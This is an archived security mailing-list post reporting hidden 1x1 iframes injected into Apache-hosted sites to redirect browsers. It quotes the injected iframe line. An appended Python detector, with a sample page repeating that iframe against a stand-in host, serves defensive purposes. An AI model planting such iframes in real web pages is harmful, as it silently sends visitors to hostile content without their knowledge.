Open Source and information security mailing list archives
 
Message-ID: <200405231519.30970.filbert@pandora.be>
From: filbert at pandora.be (Filbert)
Subject: browser hijack by apache sites

Hi,

This is the second time this weekend that I've been warned of an Apache site 
on a Linux server where a line of code was added to redirect browsers to porn 
sites.
First was the site of a Belgian political party. Second came today, and as of 
writing this it's still there. The admin was informed so it can be gone soon.

hxxp://www.previsit.com/carrefour/nl/ <- hxxp must be changed to http
IE users do NOT click.

The code added at the bottom is:

<iframe SRC="http://www.b00gle.com/fa/?d=get" WIDTH=1 
HEIGHT=1></iframe></body>

Anyone seen this before? What vulnerability is exploited here? FP?

Thx,
Filb.

-- 
echo "+++ATH0filb@...ATH0filb@...uxmail.org" | sed 's/+++ATH0//g'
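
An added example, not part of the original post: a check a site admin could run over served pages to flag near-invisible iframes that load from a foreign host, the shape of the injected line quoted above. The function names, the 2-pixel threshold, and the hosts in the constructed sample are assumptions for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

MAX_DIM = 2  # assumption: 0-2 px wide or high counts as "hidden"

def _tiny(value):
    # True for "0", "1", "2px"; False for missing values, "100%", "400"
    digits = (value or "").strip().lower().rstrip("px")
    return digits.isdigit() and int(digits) <= MAX_DIM

def _css_hidden(style):
    s = "".join(style.lower().split())
    return "display:none" in s or "visibility:hidden" in s

class IframeFinder(HTMLParser):
    """Collects iframes that are both hidden and served from another host."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []  # (line number, foreign host, src)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":  # HTMLParser lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        same_site = host == self.site_host or host.endswith("." + self.site_host)
        hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                  or _css_hidden(a.get("style", "")))
        if host and not same_site and hidden:
            self.findings.append((self.getpos()[0], host, src))

def scan_html(text, site_host):
    finder = IframeFinder(site_host)
    finder.feed(text)
    finder.close()
    return finder.findings

# Constructed sample page: one legitimate local iframe, one injected 1x1 iframe.
SAMPLE = """<html><body>
<p>Welcome</p>
<iframe src="/map.html" width="400" height="300"></iframe>
<iframe SRC="http://redirector.example.net/fa/?d=get" WIDTH=1
HEIGHT=1></iframe></body></html>
"""

if __name__ == "__main__":
    for line, host, src in scan_html(SAMPLE, "www.example.org"):
        print(f"line {line}: hidden iframe to {host} ({src})")
```

A hit only shows that the page content was altered; comparing the flagged files against a known-good copy and checking their modification times helps narrow down how the change got in.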


